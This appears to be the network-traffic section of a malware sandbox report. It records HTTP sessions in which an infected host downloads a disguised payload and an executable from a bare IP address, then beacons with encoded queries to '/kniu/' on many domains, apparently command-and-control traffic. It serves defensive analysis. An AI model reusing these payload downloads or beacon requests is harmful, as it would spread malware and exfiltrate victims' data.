Network Analysis

GET /zs/Pkzvwkppdn.mp4 HTTP/1.1 Host: 192.3.179.157 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 20 Sep 2023 08:58:57 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 Last-Modified: Wed, 20 Sep 2023 02:23:22 GMT ETag: "35e08-605c10f3f25a2" Accept-Ranges: bytes Content-Length: 220680 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: video/mp4

GET /112/TiWorker.exe HTTP/1.1 Host: 192.3.179.157

HTTP/1.1 200 OK Date: Wed, 20 Sep 2023 08:58:59 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 Last-Modified: Wed, 10 May 2023 07:05:52 GMT ETag: "2e800-5fb5180993400" Accept-Ranges: bytes Content-Length: 190464 Content-Type: application/x-msdownload

POST /kniu/ HTTP/1.1 Host: www.prosourcegraniteinc.com Connection: close Content-Length: 172 Cache-Control: no-cache Origin: http://www.prosourcegraniteinc.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.prosourcegraniteinc.com/kniu/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 20 Sep 2023 08:59:15 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Transfer-Encoding: chunked Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Set-Cookie: NID=511=r1H6MP1H7PilOrcmAKa-XdFdoH6EvZaUUzgai_8S346c2QVZcroWaYdX-pZUTvlnbvMgceLZzSXOvgMkXIr0odpY8k_budxYvJduBvum4K7aqM3tQK6LxtQN_wOTEjl25xgCpQcgPxmHqj-CFmprCrSrFJEJo2YeTtpPtzEBS8o; expires=Thu, 21-Mar-2024 08:59:15 GMT; path=/; domain=.google.com; HttpOnly Connection: close

GET /kniu/?j1=9xFgCh3s8l/k2B8O7aAt9yPceR5ZLMimGcu4Dy10KR8z2IhjbkPtetaY6rVQOSuqKBOJhR+SeENFOh5XwKmANMDhEFCrb4byHJuvuWU=&meUIyw=UGh-NJxfZ0 HTTP/1.1 Host: www.prosourcegraniteinc.com Connection: close

HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 x-ua-compatible: IE=edge Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 20 Sep 2023 08:59:17 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/GeoMerchantPrestoSiteUi/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-h0EtKcqGPquX3JJf3Zqncg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: unsafe-none Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Set-Cookie: NID=511=ugD8DtISdnzE-JO3EkNOxJWH0Glte18YIu0mO9lDmfxiV0idHJJ2CoYdSXY2ZMSoMaggnbtBmo-wf7KDxXPH20nt8mi17YZZ5W9SvhCeyFblv2TT4ZP0V64YuW8sAP5DjOp87n-Gy4rqgG4BqymJI0jYHBGw_R3oe_r_r-rZqtM; expires=Thu, 21-Mar-2024 08:59:17 GMT; path=/; domain=.google.com; HttpOnly Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked Connection: close

GET /2020/sqlite-dll-win32-x86-3330000.zip HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: www.sqlite.org Connection: Keep-Alive

HTTP/1.1 200 OK Connection: keep-alive Date: Wed, 20 Sep 2023 08:59:24 GMT Last-Modified: Wed, 25 Nov 2020 14:02:10 GMT Cache-Control: max-age=120 ETag: "m5fbe63e2s7a4fd" Content-type: application/zip; charset=utf-8 Content-length: 500989

POST /kniu/ HTTP/1.1 Host: www.theartboxslidell.com Connection: close Content-Length: 184 Cache-Control: no-cache Origin: http://www.theartboxslidell.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.theartboxslidell.com/kniu/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK date: Wed, 20 Sep 2023 08:59:38 GMT content-type: text/html; charset=utf-8 content-length: 1121 x-request-id: 0ece764b-5c20-46bf-b802-a4a266b47b8f cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZMk+F2QeWrBF0XkeVg3sDC1HFbFaS6gHMZtKbtlKhKx0XbhjN4+tXyHizR6zJiPAKgm8GwfsD7/jv4wPG4k+9w== set-cookie: parking_session=0ece764b-5c20-46bf-b802-a4a266b47b8f; expires=Wed, 20 Sep 2023 09:14:38 GMT; path=/ connection: close

GET /kniu/?j1=pbzwZ3uv6ZLNK9kOZcORaqCkpmWHCySL5KPRtIvuGjYxhe5HL3eyc57X4ozDsIqy99XGgcN1QrQuWuftpLGszPSRgY0zgb673Mjl5VE=&meUIyw=UGh-NJxfZ0 HTTP/1.1 Host: www.theartboxslidell.com Connection: close

HTTP/1.1 200 OK date: Wed, 20 Sep 2023 08:59:40 GMT content-type: text/html; charset=utf-8 content-length: 1405 x-request-id: f97cf7a9-80fd-4ba9-bf26-d8e98c6663be cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ALknt3E/Ck1PFGtsGOu2R0W9C/u6FkOPW7oOCDZf1h7CyG2p5dpQOx0o8kVG1Q10cfcCetgeTvgzWCKMJyr7Mg== set-cookie: parking_session=f97cf7a9-80fd-4ba9-bf26-d8e98c6663be; expires=Wed, 20 Sep 2023 09:14:40 GMT; path=/ connection: close

POST /kniu/ HTTP/1.1 Host: www.xxkxcfkujyeft.xyz Connection: close Content-Length: 184 Cache-Control: no-cache Origin: http://www.xxkxcfkujyeft.xyz User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.xxkxcfkujyeft.xyz/kniu/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 404 Not Found Date: Wed, 20 Sep 2023 08:59:46 GMT Server: Apache Content-Length: 267 Connection: close Content-Type: text/html; charset=iso-8859-1

GET /kniu/?j1=i0HwDxosD6vP35vKxXt8TqB5hgt09UAmGu6yXsGJ7KHeDbKCAxtr8kYkpXafqSJ5CWKS4JQhNIcZa2fBS8/HEz0POFGF5EDYOp/zgDU=&meUIyw=UGh-NJxfZ0 HTTP/1.1 Host: www.xxkxcfkujyeft.xyz Connection: close

HTTP/1.1 404 Not Found Date: Wed, 20 Sep 2023 08:59:48 GMT Server: Apache Content-Length: 267 Connection: close Content-Type: text/html; charset=iso-8859-1

POST /kniu/ HTTP/1.1 Host: www.onlyleona.com Connection: close Content-Length: 184 Cache-Control: no-cache Origin: http://www.onlyleona.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.onlyleona.com/kniu/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 405 Method Not Allowed Date: Wed, 20 Sep 2023 08:59:54 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close vary: Origin,Access-Control-Request-Method,Access-Control-Request-Headers allow: GET x-content-type-options: nosniff x-xss-protection: 1; mode=block cache-control: no-cache, no-store, max-age=0, must-revalidate,private pragma: no-cache expires: 0 x-frame-options: DENY set-cookie: DO-LB="MTAuMTA4LjAuNzo4MA=="; Max-Age=300; Path=/; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kUh3MM%2BLohm%2FtBfRxg%2BBP8DoswrxfBIgoZdzbcl4Rc%2F8v79gHONkvg6a5u5f1T7MwdBbjPu4B%2Bl1sAJhf4TccTt3xdEhAda54mWhhgh%2BVuDcjh7PpXxwWaGSvPCH%2Bpa0Zky8HA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8098dffeed9b8355-KIX alt-svc: h3=":443"; ma=86400

GET /kniu/?j1=eul8o7FRTpzZYv+GqkkzOpE5tEZO7cuUa8jf7YGp4uFOB2eW2y1ALY7ycZgKlFf7jddzg63rMJOPKD43r6dZxMpJnJONv2M7MFgI8Mw=&meUIyw=UGh-NJxfZ0 HTTP/1.1 Host: www.onlyleona.com Connection: close

HTTP/1.1 404 Not Found Date: Wed, 20 Sep 2023 08:59:56 GMT Content-Length: 0 Connection: close vary: Origin,Access-Control-Request-Method,Access-Control-Request-Headers x-content-type-options: nosniff x-xss-protection: 1; mode=block cache-control: no-cache, no-store, max-age=0, must-revalidate,private pragma: no-cache expires: 0 x-frame-options: DENY set-cookie: DO-LB="MTAuMTA4LjAuNzo4MA=="; Max-Age=300; Path=/; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mW8Ij5LYn38SF6da0diUCCZ6X5WbfscSzsK041EILyOEyS1H4NW1U5j%2BMi2%2FiJ0wH%2BBzo%2BTTMAtPkno6hLRx070qi95%2BaS%2BTBWrrCJO9grNWlVcMF74mw112DDDGBlQGv2cGiA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8098e00eaf181a26-KIX alt-svc: h3=":443"; ma=86400

POST /kniu/ HTTP/1.1 Host: www.tsygy.com Connection: close Content-Length: 184 Cache-Control: no-cache Origin: http://www.tsygy.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.tsygy.com/kniu/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Server: Nginx Microsoft-HTTPAPI/2.0 X-Powered-By: Nginx Date: Wed, 20 Sep 2023 09:00:00 GMT Connection: close

GET /kniu/?j1=bJ36cMi4kupHJe0Hctq9gMewB+uvjmGDqwrfSqfgcqRhOtXAC1zMZIlHhDCyIhSJCFAYjWOLktx1yjWN3ai585tt7uX+B1FmFo0jbF0=&meUIyw=UGh-NJxfZ0 HTTP/1.1 Host: www.tsygy.com Connection: close

HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Server: Nginx Microsoft-HTTPAPI/2.0 X-Powered-By: Nginx Date: Wed, 20 Sep 2023 09:00:02 GMT Connection: close

POST /kniu/ HTTP/1.1 Host: www.poultry-symposium.com Connection: close Content-Length: 184 Cache-Control: no-cache Origin: http://www.poultry-symposium.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.poultry-symposium.com/kniu/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK Date: Wed, 20 Sep 2023 09:00:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-CDN-nazwa.pl-location: WAW X-CDN-nazwa.pl-policyused: cdn=disabled Server: Apache/2

GET /kniu/?j1=40XX9Ytbs/otsI+0yUtAogrXy8SgXZWV889z9rydVcgoc+JCy8vgR1icdWU6u94Njq5xrtv7NQnpOX1iusCyLYuLxlHkdapdsh1Ymak=&meUIyw=UGh-NJxfZ0 HTTP/1.1 Host: www.poultry-symposium.com Connection: close

HTTP/1.1 200 OK Date: Wed, 20 Sep 2023 09:00:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-CDN-nazwa.pl-location: WAW X-CDN-nazwa.pl-policyused: cdn=disabled Server: Apache/2

POST /kniu/ HTTP/1.1 Host: www.frefire.top Connection: close Content-Length: 184 Cache-Control: no-cache Origin: http://www.frefire.top User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.frefire.top/kniu/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 404 Not Found Date: Wed, 20 Sep 2023 09:00:34 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html

GET /kniu/?j1=w8rKBuSUIg6smCThP+RZr8URK2cMAOxRwdqHG6Uo67OOMeio1zBa/jWrwyXT3+M/9aqTr1N41d9bzE5WN9beyeWExgAtk5mD8L1zbeQ=&meUIyw=UGh-NJxfZ0 HTTP/1.1 Host: www.frefire.top Connection: close

HTTP/1.1 404 Not Found Date: Wed, 20 Sep 2023 09:00:36 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8

POST /kniu/ HTTP/1.1 Host: www.siteapp.fun Connection: close Content-Length: 184 Cache-Control: no-cache Origin: http://www.siteapp.fun User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.siteapp.fun/kniu/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Wed, 20 Sep 2023 09:00:41 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=2d8c69a6-5794-11ee-a4ad-1f60f763d13b; path=/; domain=.siteapp.fun; expires=Mon, 08 Oct 2091 12:14:49 GMT; max-age=2147483647; HttpOnly

GET /kniu/?j1=6sBKYXqHQWHKIO2IG+2EqtcAj7thqVpOenJ3Aw9YNEL5O7rEWmoX1sx8Xe3NA3a7pLf2GEiO8AkwTW2yzvekojaHRlDYosZEDLTR5OQ=&meUIyw=UGh-NJxfZ0 HTTP/1.1 Host: www.siteapp.fun Connection: close

HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 609 content-type: text/html; charset=utf-8 date: Wed, 20 Sep 2023 09:00:44 GMT server: nginx set-cookie: sid=2f2d0162-5794-11ee-8a59-1f601322b613; path=/; domain=.siteapp.fun; expires=Mon, 08 Oct 2091 12:14:52 GMT; max-age=2147483647; HttpOnly

POST /kniu/ HTTP/1.1 Host: www.flyingfoxnb.com Connection: close Content-Length: 184 Cache-Control: no-cache Origin: http://www.flyingfoxnb.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.flyingfoxnb.com/kniu/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 404 Not Found server: nginx/1.14.2 date: Wed, 20 Sep 2023 09:00:51 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked x-request-id: e1f7da8e-0fa0-4c0b-b555-185aab57e29a x-runtime: 0.211990 content-encoding: gzip connection: close Strict-Transport-Security: max-age=63072000; includeSubDomains; preload

GET /kniu/?j1=2khzscf+uoNd4qXDJMvMlsCGRf74adwr4dCZmsSaM5bi7vY8OWwGY+oUQIQbfdmtzbAFku/2CGFb1XO6VHKJWfD6Hx+uzWgInko6T2A=&meUIyw=UGh-NJxfZ0 HTTP/1.1 Host: www.flyingfoxnb.com Connection: close

HTTP/1.1 200 OK server: nginx/1.14.2 date: Wed, 20 Sep 2023 09:00:53 GMT content-type: text/html; charset=utf-8 transfer-encoding: chunked x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none referrer-policy: strict-origin-when-cross-origin etag: W/"8b01751e3baa1d4917ff22be038d4d30" cache-control: max-age=0, private, must-revalidate x-request-id: 97d6f005-ad21-42bc-ae49-0471c1888809 x-runtime: 0.014784 connection: close Strict-Transport-Security: max-age=63072000; includeSubDomains; preload